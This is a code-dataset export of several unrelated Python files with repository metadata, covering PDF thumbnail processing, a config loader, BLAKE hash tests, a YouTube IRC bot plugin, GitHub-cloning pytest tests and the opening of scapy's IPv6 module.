args = [executable, '-scale-to', str(min(size)),
'-singlefile', '-png', self.pdf_filename, filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
# since pdftocairo added '.png', we need to include it with the
# filename
store_public(self.entry, 'medium', filename + '.png',
self.name_builder.fill('{basename}.medium.png'))
self.entry.set_file_metadata('medium', size=size)
class InitialProcessor(CommonPdfProcessor):
"""
Initial processing step for new pdfs
"""
name = "initial"
description = "Initial processing"
@classmethod
def media_is_eligible(cls, entry=None, state=None):
"""
Determine if this media type is eligible for processing
"""
if not state:
state = entry.state
return state in (
"unprocessed", "failed")
@classmethod
def generate_parser(cls):
parser = argparse.ArgumentParser(
description=cls.description,
prog=cls.name)
parser.add_argument(
'--size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
parser.add_argument(
'--thumb-size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
return parser
@classmethod
def args_to_request(cls, args):
return request_from_args(
args, ['size', 'thumb_size'])
def process(self, size=None, thumb_size=None):
self.common_setup()
self.extract_pdf_info()
self.copy_original()
self.generate_medium(size=size)
self.generate_thumb(thumb_size=thumb_size)
self.delete_queue_file()
class Resizer(CommonPdfProcessor):
"""
Resizing process steps for processed pdfs
"""
name = 'resize'
description = 'Resize thumbnail and medium'
thumb_size = 'size'
@classmethod
def media_is_eligible(cls, entry=None, state=None):
"""
Determine if this media type is eligible for processing
"""
if not state:
state = entry.state
return state in 'processed'
@classmethod
def generate_parser(cls):
parser = argparse.ArgumentParser(
description=cls.description,
prog=cls.name)
parser.add_argument(
'--size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
parser.add_argument(
'file',
choices=['medium', 'thumb'])
return parser
@classmethod
def args_to_request(cls, args):
return request_from_args(
args, ['size', 'file'])
def process(self, file, size=None):
self.common_setup()
if file == 'medium':
self.generate_medium(size=size)
elif file == 'thumb':
self.generate_thumb(thumb_size=size)
class PdfProcessingManager(ProcessingManager):
def __init__(self):
super().__init__()
self.add_processor(InitialProcessor)
self.add_processor(Resizer)
| 35.959831
| 103
| 0.60274
|
3e17e75c929a40c590d0f9f90fda0af71d75d5bd
| 749
|
py
|
Python
|
creds.py
|
tbass134/audiosocket-demo
|
f6f6dfd426521d649cf023e417386f0725696af1
|
[
"MIT"
] | 28
|
2016-12-16T12:21:21.000Z
|
2022-03-03T15:16:07.000Z
|
creds.py
|
rowisahub/audiosocket-demo
|
1cfc9cdfba6797b31fe1cad7d084ab78bb86125a
|
[
"MIT"
] | 1
|
2016-12-16T16:36:45.000Z
|
2016-12-16T16:36:45.000Z
|
creds.py
|
rowisahub/audiosocket-demo
|
1cfc9cdfba6797b31fe1cad7d084ab78bb86125a
|
[
"MIT"
] | 5
|
2017-02-22T07:39:58.000Z
|
2021-08-04T00:56:35.000Z
|
import logging
import os
class Config(object):
def __init__(self):
self.missing_keys = []
self.api_key = self._load('API_KEY')
self.api_secret = self._load('API_SECRET')
self.app_id = self._load('APP_ID')
self.private_key = self._load('PRIVATE_KEY')
self.phone_number = self._load('PHONE_NUMBER')
self.host = self._load('HOST')
self.port = self._load('PORT', 8000)
def _load(self, key, default=None):
val = os.getenv(key, default)
if val is None:
self.missing_keys.append(key)
logging.error("Missing environment variable %s", key)
return val
@property
def fully_configured(self):
return not self.missing_keys
| 28.807692
| 65
| 0.616822
|
0fbf16d2b3e2220a88b94229d00af1abf33c6e03
| 630
|
py
|
Python
|
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
pasta = "tomato, basil, garlic, salt, pasta, olive oil"
apple_pie = "apple, sugar, salt, cinnamon, flour, egg, butter"
ratatouille = "aubergine, carrot, onion, tomato, garlic, olive oil, pepper, salt"
chocolate_cake = "chocolate, sugar, salt, flour, coffee, butter"
omelette = "egg, milk, bacon, tomato, salt, pepper"
ingredient = input()
if ingredient in pasta:
print('pasta time!')
if ingredient in apple_pie:
print('apple pie time!')
if ingredient in ratatouille:
print('ratatouille time!')
if ingredient in chocolate_cake:
print('chocolate cake time!')
if ingredient in omelette:
print('omelette time!')
| 33.157895
| 81
| 0.71746
|
2a689497e3cd7605152f2e81c0fa3d095653246e
| 7,856
|
py
|
Python
|
thirdparty/blake/blake_test.py
|
fir3storm/Dagon
|
68cc7dc84e6f496a73d53e0c01c1d56ec18f4bb5
|
[
"MIT"
] | 188
|
2017-05-15T19:12:59.000Z
|
2022-01-19T14:00:25.000Z
|
thirdparty/blake/blake_test.py
|
Warlockk/Dagon
|
f065d7bbd7598f9a8c43bd12ba6b528cfef7377e
|
[
"MIT"
] | 108
|
2017-05-16T11:41:57.000Z
|
2019-02-01T18:53:08.000Z
|
thirdparty/blake/blake_test.py
|
Warlockk/Dagon
|
f065d7bbd7598f9a8c43bd12ba6b528cfef7377e
|
[
"MIT"
] | 62
|
2017-05-16T21:50:40.000Z
|
2022-03-21T06:38:05.000Z
|
#!/usr/bin/env python
intro = """
blake_test.py
version 4
This program tests blake.py individually and against a C
reference implementation wrapped with blake_wrapper.py.
It works for both Python2 and Python3.
Copyright (c) 2009-2012 by Larry Bugbee, Kent, WA
ALL RIGHTS RESERVED.
blake_test.py IS EXPERIMENTAL SOFTWARE FOR EDUCATIONAL
PURPOSES ONLY. IT IS MADE AVAILABLE "AS-IS" WITHOUT
WARRANTY OR GUARANTEE OF ANY KIND. ITS USE SIGNIFIES
FULL ACCEPTANCE OF ALL RISK, UNDER ALL CIRCUMSTANCES, NO
EXCEPTIONS.
To make your learning and experimentation less cumbersome,
blake_test.py is free for any use.
Enjoy,
Larry Bugbee
April 2012
"""
import sys
from ctypes import *
from binascii import hexlify, unhexlify
_version = '1'
# import two modules with identical class and method names, but
# keep them individually identifiable
have_blake = False
have_blake_wrapper = False
try:
from blake import BLAKE as BLAKEpy
have_blake = True
except:
print('\n *** unable to import blake.py *** \n')
try:
from blake_wrapper import BLAKE as BLAKEwrap
# the next line is obsolesent and will be removed someday
from blake_wrapper import BLAKE_func as BLAKEwrap_func
have_blake_wrapper = True
except:
print('\n *** unable to import blake_wrapper.py *** \n')
# ---------------------------------------------------------------
# test vectors
def basic_tests():
if 0:
print(intro)
def test_BLAKE(hashlen, msg, expect):
print(' BLAKE-%d: msg = %s length = %d' %
(hashlen, msg.decode(), len(msg)))
digest = BLAKE(hashlen).digest(msg)
print(' %s %s' % ('valid ' if digest == unhexlify(expect)
else 'ERROR >>>', hexlify(digest).decode()))
if 1:
print('')
print(' single null-byte message:')
msg = b'\x00'
hashlen = 256
expect = (b'0ce8d4ef4dd7cd8d62dfded9d4edb0a7' +
b'74ae6a41929a74da23109e8f11139c87')
test_BLAKE(hashlen, msg, expect)
hashlen = 224
expect = (b'4504cb0314fb2a4f7a692e696e487912' +
b'fe3f2468fe312c73a5278ec5')
test_BLAKE(hashlen, msg, expect)
hashlen = 512
expect = (b'97961587f6d970faba6d2478045de6d1' +
b'fabd09b61ae50932054d52bc29d31be4' +
b'ff9102b9f69e2bbdb83be13d4b9c0609' +
b'1e5fa0b48bd081b634058be0ec49beb3')
test_BLAKE(hashlen, msg, expect)
hashlen = 384
expect = (b'10281f67e135e90ae8e882251a355510' +
b'a719367ad70227b137343e1bc122015c' +
b'29391e8545b5272d13a7c2879da3d807')
test_BLAKE(hashlen, msg, expect)
if 1:
print('')
print(' 72 null-bytes message:')
msg = b'\x00' * 72
hashlen = 256
expect = (b'd419bad32d504fb7d44d460c42c5593f' +
b'e544fa4c135dec31e21bd9abdcc22d41')
test_BLAKE(hashlen, msg, expect)
hashlen = 224
expect = (b'f5aa00dd1cb847e3140372af7b5c46b4' +
b'888d82c8c0a917913cfb5d04')
test_BLAKE(hashlen, msg, expect)
print('')
print(' 144 null-bytes message:')
msg = b'\x00' * 144
hashlen = 512
expect = (b'313717d608e9cf758dcb1eb0f0c3cf9f' +
b'c150b2d500fb33f51c52afc99d358a2f' +
b'1374b8a38bba7974e7f6ef79cab16f22' +
b'ce1e649d6e01ad9589c213045d545dde')
test_BLAKE(hashlen, msg, expect)
hashlen = 384
expect = (b'0b9845dd429566cdab772ba195d271ef' +
b'fe2d0211f16991d766ba749447c5cde5' +
b'69780b2daa66c4b224a2ec2e5d09174c')
test_BLAKE(hashlen, msg, expect)
if 1:
print('')
print(' more:')
if 1:
msg = b'Kilroy was here!'
hashlen = 256
expect = (b'b25c02ccfa1f664d25a15d999b56a4be' +
b'1ad84a029a96be5d654387a2def99916')
test_BLAKE(hashlen, msg, expect)
msg = b'The quick brown fox jumps over the lazy dog'
hashlen = 512
expect = (b'1F7E26F63B6AD25A0896FD978FD050A1' +
b'766391D2FD0471A77AFB975E5034B7AD' +
b'2D9CCF8DFB47ABBBE656E1B82FBC634B' +
b'A42CE186E8DC5E1CE09A885D41F43451')
test_BLAKE(hashlen, msg, expect)
if 1:
msg = b'\x00' * 55
hashlen = 256
expect = (b'dc980544f4181cc43505318e317cdfd4' +
b'334dab81ae035a28818308867ce23060')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 56
hashlen = 256
expect = (b'26ae7c289ebb79c9f3af2285023ab103' +
b'7a9a6db63f0d6b6c6bbd199ab1627508')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 111
hashlen = 512
expect = (b'125695c5cc01de48d8b107c101778fc4' +
b'47a55ad3440a17dc153c6c652faecdbf' +
b'017aed68f4f48826b9dfc413ef8f14ae' +
b'7dfd8b74a0afcf47b61ce7dcb1058976')
test_BLAKE(hashlen, msg, expect)
msg = b'\x00' * 112
hashlen = 512
expect = (b'aa42836448c9db34e0e45a49f916b54c' +
b'25c9eefe3f9f65db0c13654bcbd9a938' +
b'c24251f3bedb7105fa4ea54292ce9ebf' +
b'5adea15ce530fb71cdf409387a78c6ff')
test_BLAKE(hashlen, msg, expect)
if 0:
import time
print('')
print(' simple timimg test:')
def time_it(hashsize, iter):
t0 = time.time()
for i in range(iter):
digest = BLAKE(hashsize).digest(b'\x00') # hash a single null byte
t1 = time.time()
template = ' %8d iterations of single-block BLAKE-%d took %8.6f seconds'
print(template % (iter, hashsize, (t1 - t0)))
iterations = [10, 100, 1000]
hashsizes = [256, 512]
for hashsize in hashsizes:
for iter in iterations:
time_it(hashsize, iter)
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
if have_blake:
# testing blake.py independently
BLAKE = BLAKEpy
print('\n Testing blake.py:')
print(' -----------------')
basic_tests()
if have_blake_wrapper:
# testing blake_wrapper.py independently
BLAKE = BLAKEwrap
BLAKE_func = BLAKEwrap_func
print('\n Testing blake_wrapper.py:')
print(' -------------------------')
basic_tests()
if have_blake and have_blake_wrapper:
# now run a series of tests against each other
print('\n Comparing results fm blake.py with blake_wrapper.py:')
print(' ----------------------------------------------------')
hashsizes = [256, 512]
testchar = b'\xff'
for hashsize in hashsizes:
print(' BLAKE-%d:' % hashsize)
errors = 0
for i in range(550):
if (BLAKEpy(hashsize).final(testchar * i) !=
BLAKEwrap(hashsize).final(testchar * i)):
errors += 1
print(' *** blake.py and blake_wrapper.py' +
' do not agree for chr(%d)*%d ***' % (testchar, i))
if not errors:
print(' no errors found')
print('')
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
| 32.196721
| 87
| 0.53806
|
4d3ae95ae00aaaa423668aeb768e22f7e546ebb4
| 271
|
py
|
Python
|
moldesign/orbitals/__init__.py
|
Autodesk/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 147
|
2016-07-15T18:53:55.000Z
|
2022-01-30T04:36:39.000Z
|
moldesign/orbitals/__init__.py
|
cherishyli/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 151
|
2016-07-15T21:35:11.000Z
|
2019-10-10T08:57:29.000Z
|
moldesign/orbitals/__init__.py
|
cherishyli/molecular-design-toolkit
|
5f45a47fea21d3603899a6366cb163024f0e2ec4
|
[
"Apache-2.0"
] | 33
|
2016-08-02T00:04:51.000Z
|
2021-09-02T10:05:04.000Z
|
def toplevel(o):
__all__.append(o.__name__)
return o
__all__ = []
from .primitives import *
from .gaussians import *
from .orbitals import *
from .cartesian import *
from .spherical import *
from .atomic_basis_fn import *
from .basis import *
from .wfn import *
| 19.357143
| 30
| 0.723247
|
f1fb14f7c9e4a07a352d797989213fed3843d32f
| 6,155
|
py
|
Python
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 96
|
2015-01-24T00:00:45.000Z
|
2022-03-15T14:06:57.000Z
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 166
|
2015-01-02T02:30:24.000Z
|
2022-03-24T20:03:55.000Z
|
plugins/youtube/plugin.py
|
dkim286/Cardinal
|
716d38fae5c992315e8087de74ad0db2947d0d48
|
[
"MIT"
] | 63
|
2015-02-13T06:46:01.000Z
|
2022-02-24T10:50:34.000Z
|
import datetime
import re
import logging
import requests
from twisted.internet import defer
from twisted.internet.threads import deferToThread
from cardinal.decorators import command, event, help
from cardinal.exceptions import EventRejectedMessage
VIDEO_URL_REGEX = re.compile(r'https?:\/\/(?:www\.)?youtube\..{2,4}\/watch\?.*(?:v=(.+?))(?:(?:&.*)|$)', flags=re.IGNORECASE) # noqa: E501
VIDEO_URL_SHORT_REGEX = re.compile(r'https?:\/\/(?:www\.)?youtu\.be\/(.+?)(?:(?:\?.*)|$)', flags=re.IGNORECASE) # noqa: E501
# Fetched from the YouTube API on 2021-06-04, hopefully it doesn't change.
MUSIC_CATEGORY_ID = 10
# The following two functions were borrowed from Stack Overflow:
# https://stackoverflow.com/a/64232786/242129
def get_isosplit(s, split):
if split in s:
n, s = s.split(split)
else:
n = 0
return n, s
def parse_isoduration(s):
# Remove prefix
s = s.split('P')[-1]
# Step through letter dividers
days, s = get_isosplit(s, 'D')
_, s = get_isosplit(s, 'T')
hours, s = get_isosplit(s, 'H')
minutes, s = get_isosplit(s, 'M')
seconds, s = get_isosplit(s, 'S')
# Convert all to seconds
dt = datetime.timedelta(
days=int(days),
hours=int(hours),
minutes=int(minutes),
seconds=int(seconds),
)
return dt
class YouTubePlugin:
logger = None
"""Logging object for YouTubePlugin"""
api_key = None
"""API key for Youtube API"""
def __init__(self, cardinal, config):
# Initialize logging
self.logger = logging.getLogger(__name__)
if config is None:
return
if 'api_key' in config:
self.api_key = config['api_key']
@command(['youtube', 'yt'])
@help("Get the first YouTube result for a given search.")
@help("Syntax: .youtube <search query>")
@defer.inlineCallbacks
def search(self, cardinal, user, channel, msg):
# Before we do anything, let's make sure we'll be able to query YouTube
if self.api_key is None:
cardinal.sendMsg(
channel,
"YouTube plugin is not configured correctly. "
"Please set API key."
)
# Grab the search query
try:
search_query = msg.split(' ', 1)[1]
except IndexError:
cardinal.sendMsg(channel, "Syntax: .youtube <search query>")
return
try:
result = yield self._search(search_query)
except Exception:
self.logger.exception("Failed to search YouTube")
cardinal.sendMsg(channel, "Error while searching YouTube")
return
if result is None:
cardinal.sendMsg(channel, "No videos found matching that search.")
return
try:
message = yield self._get_formatted_details(
result['id']['videoId']
)
except Exception:
self.logger.exception("Error finding search result details")
cardinal.sendMsg(channel, "Error while searching YouTube")
return
cardinal.sendMsg(channel, message)
@defer.inlineCallbacks
def _get_formatted_details(self, video_id):
params = {
'id': video_id,
'maxResults': 1,
'part': 'snippet,statistics,contentDetails'
}
result = (yield self._form_request("videos", params))['items'][0]
return self._parse_item(result)
@defer.inlineCallbacks
def _search(self, search_query):
params = {
'q': search_query,
'part': 'snippet',
'maxResults': 1,
'type': 'video',
}
result = yield self._form_request("search", params)
if 'error' in result:
raise Exception("Error searching Youtube: %s" % result['error'])
try:
return result['items'][0]
except IndexError:
return None
@event('urls.detection')
@defer.inlineCallbacks
def _get_video_info(self, cardinal, channel, url):
match = re.match(VIDEO_URL_REGEX, url)
if not match:
match = re.match(VIDEO_URL_SHORT_REGEX, url)
if not match:
raise EventRejectedMessage
video_id = match.group(1)
params = {
'id': video_id,
'maxResults': 1,
'part': 'snippet,statistics,contentDetails',
}
try:
result = yield self._form_request("videos", params)
except Exception:
self.logger.exception("Failed to fetch info for %s'" % video_id)
raise EventRejectedMessage
try:
message = self._parse_item(result['items'][0])
cardinal.sendMsg(channel, message)
except Exception:
self.logger.exception("Failed to parse info for %s'" % video_id)
raise EventRejectedMessage
@defer.inlineCallbacks
def _form_request(self, endpoint, params):
# Add API key to all requests
params['key'] = self.api_key
r = yield deferToThread(
requests.get,
"https://www.googleapis.com/youtube/v3/" + endpoint,
params=params,
)
return r.json()
def _parse_item(self, item):
title = str(item['snippet']['title'])
views = int(item['statistics']['viewCount'])
uploader = str(item['snippet']['channelTitle'])
if len(uploader) == 0:
uploader = "(not available)"
dt = parse_isoduration(item['contentDetails']['duration'])
video_id = str(item['id'])
# Decorate music videos
category = int(item['snippet']['categoryId'])
if category == MUSIC_CATEGORY_ID:
title = '♫ ' + title + ' ♫'
message_parts = [
"Title: {}".format(title),
"Uploaded by: {}".format(uploader),
"Duration: {}".format(dt),
"{:,} views".format(views),
"https://youtube.com/watch?v={}".format(video_id),
]
return "[ {} ]".format(' | '.join(message_parts))
entrypoint = YouTubePlugin
| 29.7343
| 139
| 0.576767
|
cb7918fde0bdef8c015d146f90f22520513365af
| 7,609
|
py
|
Python
|
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | null | null | null |
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | 1
|
2020-11-24T18:08:42.000Z
|
2020-12-17T04:30:42.000Z
|
tests/test_datamine.py
|
KeiferC/extract-table
|
71995693aace37ab9a3637b472d996d7b9e68207
|
[
"MIT"
] | 1
|
2020-11-24T17:53:40.000Z
|
2020-11-24T17:53:40.000Z
|
import os
import json
import subprocess
import pytest
import gdutils.datamine as dm
#########################################
# Regression Test Inputs #
#########################################
standards_path = './docs/source/src/examples/naming_convention.json'
gh_user = 'octocat'
gh_acct_type = 'users'
gh_repos = [ # Note: this list is subject to change
'boysenberry-repo-1',
'git-consortium',
'hello-worId',
'Hello-World',
'linguist',
'octocat.github.io',
'Spoon-Knife',
'test-repo1']
public_gh_repos = [ # Note: also subject to change
'https://github.com/octocat/boysenberry-repo-1.git',
'https://github.com/octocat/git-consortium.git',
'https://github.com/octocat/hello-worId.git',
'https://github.com/octocat/Hello-World.git',
'https://github.com/octocat/linguist.git',
'https://github.com/octocat/octocat.github.io.git',
'https://github.com/octocat/Spoon-Knife.git',
'https://github.com/octocat/test-repo1.git']
gitignores = [ # Note: same
'./.gitignore',
'./.pytest_cache/.gitignore',
'./tests/dumps/linguist/.gitignore',
'./tests/dumps/linguist/vendor/grammars/Sublime-Inform/.gitignore']
htmls = [ # Note: same here
'./tests/dumps/linguist/samples/HTML/pages.html',
'./tests/dumps/octocat.github.io/index.html',
'./tests/dumps/Spoon-Knife/index.html']
descriptions = [ # Note: ditto
'./tests/dumps/linguist/.git/description',
'./tests/dumps/octocat.github.io/.git/description',
'./tests/dumps/git-consortium/.git/description',
'./tests/dumps/hello-worId/.git/description',
'./tests/dumps/test-repo1/.git/description',
'./tests/dumps/boysenberry-repo-1/.git/description',
'./tests/dumps/Hello-World/.git/description',
'./tests/dumps/Spoon-Knife/.git/description',
'./.git/description']
#########################################
# Regression Tests #
#########################################
def test_list_gh_repos():
with pytest.raises(Exception):
dm.list_gh_repos()
with pytest.raises(Exception):
dm.list_gh_repos('octocat')
with pytest.raises(Exception):
dm.list_gh_repos('octocat', 'asdf')
with pytest.raises(Exception): # randomly generated string for user
dm.list_gh_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY', 'users')
repos = dm.list_gh_repos('octocat', 'users')
assert set(repos) == set(zip(gh_repos, public_gh_repos))
def test_clone_gh_repos():
with pytest.raises(Exception):
dm.clone_gh_repos()
with pytest.raises(Exception):
dm.clone_gh_repos('octocat')
with pytest.raises(Exception):
dm.clone_gh_repos('octocat', 'asdf')
with pytest.raises(Exception):
dm.clone_gh_repos('octocat', 'orgs')
with pytest.raises(Exception): # randomly generated string for user
dm.clone_gh_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY', 'users')
dm.clone_gh_repos('octocat', 'users', outpath='tests/dumps')
dirs = next(os.walk(os.path.join('tests', 'dumps')))
assert set(dirs[1]) == set(gh_repos)
dm.clone_gh_repos('mggg-states', 'orgs', ['CT-shapefiles'],
os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert set(dirs[1]) == {'CT-shapefiles'}
dm.clone_gh_repos('mggg-states', 'orgs',
['AZ-shapefiles', 'HI-shapefiles'],
os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert set(dirs[1]) == {'CT-shapefiles', 'AZ-shapefiles',
'HI-shapefiles'}
def test_list_files_of_type():
with pytest.raises(Exception):
dm.list_files_of_type(1)
files = dm.list_files_of_type('description')
ds = descriptions.copy()
ds.append('./tests/dumps2/AZ-shapefiles/.git/description')
ds.append('./tests/dumps2/CT-shapefiles/.git/description')
ds.append('./tests/dumps2/HI-shapefiles/.git/description')
assert set(files) == set(ds)
files = dm.list_files_of_type('.q;weoifh0[238ubfasdf')
assert files == []
files = dm.list_files_of_type(['description', '.html'],
os.path.join('tests', 'dumps'))
assert files.sort() == (descriptions + htmls).sort()
files = dm.list_files_of_type('description',
os.path.join('tests', 'dumps'))
descriptions.remove('./.git/description')
descrs = [d.lstrip('./') for d in descriptions]
assert set(files) == set(descrs)
files = dm.list_files_of_type('.gitignore', exclude_hidden = True)
assert files == []
files = dm.list_files_of_type('.gitignore', exclude_hidden = False)
assert files == gitignores
def test_get_keys_by_category(): # test passing list of categories, try numbers
with open(standards_path) as json_file:
standards_raw = json.load(json_file)
with pytest.raises(Exception):
dne = dm.get_keys_by_category(standards_raw, '-1293urnpef13qewf')
with pytest.raises(Exception):
numbered = dm.get_keys_by_category(
{1 : {9: 'asdf'}, 2 : {8: 'fdsa'}}, 1)
with pytest.raises(Exception):
xs = dm.get_keys_by_category(
{'foo' : [1, 2, {'fdaa : asdf'}]}, 'foo')
numbered = dm.get_keys_by_category(
{1 : [{9: 'asdf'}], 2 : [{8: 'fdsa'}]}, 1)
assert numbered == [9]
parties = dm.get_keys_by_category(standards_raw, 'parties')
assert parties == ['D', 'R', 'L', 'G', 'I', 'U']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': ['asdf', 'fdaa'],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[1, 2, 3]')
assert xs == ['a', 's', 'd', 'f', 'f', 'd', 'a', 'a']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': ['asdf', 'fdaa'],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[4, 5, 6]')
assert xs == ['fdas', 'hjkl']
xs = dm.get_keys_by_category(
{'[1, 2, 3]': [[1, 2, 3], {'fdaa' : 'asdf'}],
'[4, 5, 6]': [{'fdas': 'fdsa'}, {'hjkl' : 'hjkl'}],
'foo': [{'bar': 'bar'}]}, '[1, 2, 3]')
assert xs == [1, 2, 3, 'fdaa']
xs = dm.get_keys_by_category(
{'category1' : [['key1']],
'category2' : [['key2'], {'key3': 'value3'}]},
['category1', 'category2'])
assert xs == ['key1', 'key2', 'key3']
def test_remove_repos():
with pytest.raises(Exception):
dm.remove_repos('XGx2ePfMTt3jbQEGWCzCHaRzWpC6Vz7qY48VY')
dm.remove_repos(os.path.join('tests', 'dumps'))
dirs = next(os.walk(os.path.join('tests', 'dumps')))
assert not any(list(map(lambda x, y: x == y, set(dirs[1]), set(gh_repos))))
dm.remove_repos(os.path.join('tests', 'dumps2'))
dirs = next(os.walk(os.path.join('tests', 'dumps2')))
assert not any(list(map(lambda x, y: x == y, set(dirs[1]),
{'CT-shapefiles', 'AZ-shapefiles',
'HI-shapefiles'})))
path_to_ak_shp = os.path.join('tests', 'dumps', 'AK-shapefiles')
dm.clone_gh_repos('mggg-states', 'orgs', ['AK-shapefiles'],
os.path.join('tests', 'dumps'))
assert os.path.join(path_to_ak_shp, 'README.md') in \
dm.list_files_of_type('.md', path_to_ak_shp)
dm.remove_repos(path_to_ak_shp)
with pytest.raises(Exception):
xs = dm.list_files_of_type('.md', path_to_ak_shp)
dm.remove_repos(os.path.join('tests', 'dumps')) # should not raise anything
| 36.581731
| 79
| 0.588251
|
124d913e75828aea3849266130bf05a56d039beb
| 146,756
|
py
|
Python
|
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
venv/local/lib/python2.7/dist-packages/scapy/layers/inet6.py
|
pengwu/scapy_env
|
3db9c5dea2e219048a2387649d6d89be342903d9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
import random
import socket
import sys
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.base_classes import *
from scapy.data import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.utils import inet_pton, inet_ntop, strxor
from scapy.error import warning
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
of the neighbor with specified IPv6 address addr. 'src' address is
used as source of the message. Message is sent on iface. By default,
timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
def getmacbyip6(ip6, chainCC=0):
"""
Returns the mac address to be used for provided 'ip6' peer.
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
